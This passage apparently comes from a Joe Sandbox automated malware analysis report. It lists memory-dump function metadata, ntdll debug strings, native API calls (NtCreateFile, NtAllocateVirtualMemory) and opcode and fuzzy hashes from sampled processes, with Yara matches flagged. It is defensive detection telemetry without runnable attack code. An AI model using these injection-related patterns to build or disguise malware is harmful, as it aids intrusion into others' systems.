                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 23BA4742
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 23BA4725
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 23BA4655
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 23BA46FC
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 23BA4787
                            • ExecuteOptions, xrefs: 23BA46A0
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            • Opcode ID: f60211649abaa4908bb65cf1844ffff82f4038940d218440206ea0cfb866c3d0
                            • Instruction ID: e3c69315c4ecd05ed5b56e3aa99e6252e95e92d4195262c8a86289a7f888d17b
                            • Opcode Fuzzy Hash: f60211649abaa4908bb65cf1844ffff82f4038940d218440206ea0cfb866c3d0
                            • Instruction Fuzzy Hash: DA51FB31A003597ADB10EEA8DC8AFAE77B8EF18304F1400F9EA15A7592DB719E45CF54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                            • Instruction ID: 3d3a73d1f26ed6c1dde9e72bf4cdbf522ab1444999020483f0a54e329fc161ed
                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                            • Instruction Fuzzy Hash: C681CE72E452498EDF14DF68C890BEEBBB6EF45360F1842BAD970A73A1C73489408F54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 23BA02E7
                            • RTL: Re-Waiting, xrefs: 23BA031E
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 23BA02BD
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            • Opcode ID: 8385d8d7b66abcd050e140fc64b039a4a4c4ad075cc54e7a28ea348d9a913b3a
                            • Instruction ID: 527adfc992474d8729a013e370c806888f06ef3ce045fb7acee4b6a509d90abe
                            • Opcode Fuzzy Hash: 8385d8d7b66abcd050e140fc64b039a4a4c4ad075cc54e7a28ea348d9a913b3a
                            • Instruction Fuzzy Hash: 75E19A31608B81DFD721DF28C888B1AB7E5FB88364F144AB9F5A48B2E1D774D945CB42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 23BA7B7F
                            • RTL: Re-Waiting, xrefs: 23BA7BAC
                            • RTL: Resource at %p, xrefs: 23BA7B8E
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            • Opcode ID: 10693ee383efdb6ba173ba431e0121ba3d1f08daaa1d4fda3b920e0266ce6960
                            • Instruction ID: 287a38d6590254fec1e82d9aeb3e5011f2724c35603fea2db33869b0686f38e6
                            • Opcode Fuzzy Hash: 10693ee383efdb6ba173ba431e0121ba3d1f08daaa1d4fda3b920e0266ce6960
                            • Instruction Fuzzy Hash: C041E0317047028FC724DE2AC851B5AB7F9EB98310F100ABDE999DB6A1DB30E5058F91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 23BA728C
                            Strings
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 23BA7294
                            • RTL: Re-Waiting, xrefs: 23BA72C1
                            • RTL: Resource at %p, xrefs: 23BA72A3
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            • Opcode ID: 32d4126b3cbb3e46d2d0f12cbebb1ceb8c639d0c25d677b6c5aee19be6f323fa
                            • Instruction ID: 53552ce356bb8c28f0d77301379e43587c3602655a2a0c5a5bead77849ca1ba5
                            • Opcode Fuzzy Hash: 32d4126b3cbb3e46d2d0f12cbebb1ceb8c639d0c25d677b6c5aee19be6f323fa
                            • Instruction Fuzzy Hash: C1410131A08706ABC720DE69CC52F5AB7B5FB99310F1406B9F994DB641DB30E812CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction ID: 7c424358abf6efe86bdbdb22237bf25dedd0a43ad77f5c29267a4a302eed6627
                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction Fuzzy Hash: 2B91D772E002499FDB10EF69C982ABEB7B5EF44320F1845BAE974EB6E1D73089418754
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280
                            • Opcode ID: 83676ea44ba39cdecd05d57d31ccdf5b8cae58a6c9898a1a44b512d6b20a99f8
                            • Instruction ID: 017190adbb4b48e97d4e02caae16ea30ab8d40b04e640e08d209a17b41b7e7e8
                            • Opcode Fuzzy Hash: 83676ea44ba39cdecd05d57d31ccdf5b8cae58a6c9898a1a44b512d6b20a99f8
                            • Instruction Fuzzy Hash: 3B812972D112699BDB21DF54CC44BEEB7B8AF08750F0041EAAA19B7290D7709E84CFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:1.7%
                            Dynamic/Decrypted Code Coverage:5.9%
                            Signature Coverage:1%
                            Total number of Nodes:303
                            Total number of Limit Nodes:46

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $$)$)A$8$:'Dy$>*$>*$>{$Dy$E($WG$Z,$[$`t$c_$d5$dG$f$m$o#$sI$7$9$=$>$g
                            • API String ID: 0-1036288621
                            • Opcode ID: 84c03cd0d7bc068fc0900ecb9c4e1c647b96381b6229c413adb3b7c431646d34
                            • Instruction ID: 6c3ae20926bee6536046d943546eefbb49849a5695a60b69e65665d8b49f821b
                            • Opcode Fuzzy Hash: 84c03cd0d7bc068fc0900ecb9c4e1c647b96381b6229c413adb3b7c431646d34
                            • Instruction Fuzzy Hash: DA329DB0D05268CBEB64CF45C898BDDBBB1BB85308F2081D9C14D6B285C7B95AC9CF56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 009E76AD
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: b9abd527e90aaa0e9c0c74347a5ad172f83263dc1d92da8f1f8144a663922003
                            • Instruction ID: 8ec16331e79f4dc46ffce294aa5f3d9fa6335aae71ce15df09cde7d9dd30097f
                            • Opcode Fuzzy Hash: b9abd527e90aaa0e9c0c74347a5ad172f83263dc1d92da8f1f8144a663922003
                            • Instruction Fuzzy Hash: 1C31C0B5A00249AFCB14DF99D881EEFB7B9AF8C314F108219FD18A3340D730A951CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 009E77F2
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 73e5de2b366e5a564657d96d0eda35c0a6b01ddf1d3552d284136a3f02d934e3
                            • Instruction ID: 7da6d25ecf030130717d2df35e5df5b4203b2770d42f1e71272d83a9122f1bbd
                            • Opcode Fuzzy Hash: 73e5de2b366e5a564657d96d0eda35c0a6b01ddf1d3552d284136a3f02d934e3
                            • Instruction Fuzzy Hash: 7B31E6B5A00209AFCB14DF99D881EEFB7B9EF8C314F108609FD18A7241D730A911CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(009D13DE,?,009E66C7,00000000,00000004,00003000,?,?,?,?,?,009E66C7,009D13DE,009E66C7,00000000), ref: 009E7A97
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: 38ae9d79fb6ade4669b09d4cace4adc7d7bc1f3928e9ec88c2c1b37895e66666
                            • Instruction ID: 1d723ec2980e9d5450ce110a8220539a855aecee81485dfe1a6907c9d72fd2b2
                            • Opcode Fuzzy Hash: 38ae9d79fb6ade4669b09d4cace4adc7d7bc1f3928e9ec88c2c1b37895e66666
                            • Instruction Fuzzy Hash: F621FFB5A00649AFC714DF59DC81FAFB7B9EF88710F008519FD1897241D770A911CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 009E78C1
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 65d5252faa2608ae058e428c0cedcf7f8f0139f20cb8005d0f643aaf0fd4ccaa
                            • Instruction ID: eee8c33b5651216c1addc49134015533c5b1058dfe52d03162c7cec0444590c7
                            • Opcode Fuzzy Hash: 65d5252faa2608ae058e428c0cedcf7f8f0139f20cb8005d0f643aaf0fd4ccaa
                            • Instruction Fuzzy Hash: 38E08C36610204BBD220FA9ACC41FAB776DEFC9760F808419FA08A7242C671B91187F5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e5434f84936df11c4d6c6a8ce550547e148fe9a54af4061b2d7861073f320c9c
                            • Instruction ID: cdfdc7493681467fe90d9478eabc90568abb6b28ac67923560d2fa33e1911077
                            • Opcode Fuzzy Hash: e5434f84936df11c4d6c6a8ce550547e148fe9a54af4061b2d7861073f320c9c
                            • Instruction Fuzzy Hash: D790027160550403F1007158451870620068BD0615F65C431A1425568D8795DA5165B2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 2e4ae1e82ac108431bc6455a8e46659baf3b5b1c1f6462fe5614a9ec3ca753da
                            • Instruction ID: 1da193b9cf64760d155c9cb722ba62b12002ca5abf58e921de6509239d595aec
                            • Opcode Fuzzy Hash: 2e4ae1e82ac108431bc6455a8e46659baf3b5b1c1f6462fe5614a9ec3ca753da
                            • Instruction Fuzzy Hash: 509002A16015004361407158480840670069BE1715395C135A1555560C8618D9559279
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4ce02954ca7f48f2928a5ae282ba9fee5e38ec3cd2472ec5662614279919e596
                            • Instruction ID: eaf1508164f201429626e5b138ab11e30169a4130f090d5b3d7b9edeb835f8d7
                            • Opcode Fuzzy Hash: 4ce02954ca7f48f2928a5ae282ba9fee5e38ec3cd2472ec5662614279919e596
                            • Instruction Fuzzy Hash: 8A90027160580013B1407158488854650069BE0715B55C031E1425554C8A14DA565371
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 56aba233af56738357272433aa63aceb62e5cf76353e317c732759f51604bd32
                            • Instruction ID: ef83c57c36edc5603f7f1b66491e1949e0e147485585662a6e6b6ebb5d202aac
                            • Opcode Fuzzy Hash: 56aba233af56738357272433aa63aceb62e5cf76353e317c732759f51604bd32
                            • Instruction Fuzzy Hash: 4A90027120140403F1007598540C64610068BE0715F55D031A6025555EC665D9916131
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: c9246133fa460a3ab24578f622d8bad07ecfbf3c825ba2cfd15397c90f25e19c
                            • Instruction ID: 6e3262d149312d0d95664c73f25f07d9335a40bc1de2406fc921f36fe6e610f6
                            • Opcode Fuzzy Hash: c9246133fa460a3ab24578f622d8bad07ecfbf3c825ba2cfd15397c90f25e19c
                            • Instruction Fuzzy Hash: 2290027120140843F10071584408B4610068BE0715F55C036A1125654D8615D9517531
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 49dff781945baa36fb0dc0eb959f38aa8ba330d9e062746a8ecff835f9b4b523
                            • Instruction ID: c5b92a69d59b2b4ea268001e7f5ceea6db1eabafe116bb8ad3fd54712a143b0d
                            • Opcode Fuzzy Hash: 49dff781945baa36fb0dc0eb959f38aa8ba330d9e062746a8ecff835f9b4b523
                            • Instruction Fuzzy Hash: 6E90027120148803F1107158840874A10068BD0715F59C431A5425658D8695D9917131
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 56b45df215d24274edc7ccbb72218faa8cb7d5a6fceacb883784dd291f391ba1
                            • Instruction ID: fbca3194e6e26fbff650bd04d363e1b0d00f4a022cf3ae3f10be543af7d34359
                            • Opcode Fuzzy Hash: 56b45df215d24274edc7ccbb72218faa8cb7d5a6fceacb883784dd291f391ba1
                            • Instruction Fuzzy Hash: 2C900261242441537545B158440850750079BE0655795C032A2415950C8526E956D631
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 67bbd0041727509714d869ff7c389fdafb8d21508d3692cc5f6631020ba5c7c2
                            • Instruction ID: 5c8bb5fbe1f13848963249bf951a2ba8e7f92df6922df6671afb08f431e7eef8
                            • Opcode Fuzzy Hash: 67bbd0041727509714d869ff7c389fdafb8d21508d3692cc5f6631020ba5c7c2
                            • Instruction Fuzzy Hash: CA90027120140413F11171584508707100A8BD0655F95C432A1425558D9656DA52A131
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ad9f56a590d8c1c4a790c6514908e2e5e25beebf22209cc310664e8e993cb1e8
                            • Instruction ID: 49163823b9a6aff8493740e0f6b960f90914915a557a61e11a498f05c9e62142
                            • Opcode Fuzzy Hash: ad9f56a590d8c1c4a790c6514908e2e5e25beebf22209cc310664e8e993cb1e8
                            • Instruction Fuzzy Hash: 4590026921340003F1807158540C60A10068BD1616F95D435A1016558CC915D9695331
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: f21d189dd66c2093780b138e1596a95ff1c9ee8849573244438cade869fe2095
                            • Instruction ID: 314973996a58a173808afedf840ad74f8d7695f7e939fe818dbb9695b2f8c04c
                            • Opcode Fuzzy Hash: f21d189dd66c2093780b138e1596a95ff1c9ee8849573244438cade869fe2095
                            • Instruction Fuzzy Hash: 6590047130140003F140715C541C7075007DFF1715F55D031F1415554CDD15DD575333
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ed307bb1292154276ee913602318226ed37fe04715b378d5c5aa40915df10e29
                            • Instruction ID: 7d87700b549d68572fadf0de2171c3d882eeec08550b97a238d7233fb249ec99
                            • Opcode Fuzzy Hash: ed307bb1292154276ee913602318226ed37fe04715b378d5c5aa40915df10e29
                            • Instruction Fuzzy Hash: 3A9002A120180403F1407558480860710068BD0716F55C031A3065555E8A29DD516135
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 3c156265ca42f9b64ac36468e2c2d0b8bfeb629856b7ac330ec09b5238909df2
                            • Instruction ID: 4d39715bc8cc888ace857a9cf8ecde05e5a3cfc2bdd9f8b9e5ac3dd03f2a3bbe
                            • Opcode Fuzzy Hash: 3c156265ca42f9b64ac36468e2c2d0b8bfeb629856b7ac330ec09b5238909df2
                            • Instruction Fuzzy Hash: 7990026160140503F10171584408616100B8BD0655F95C032A2025555ECA25DA92A131
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
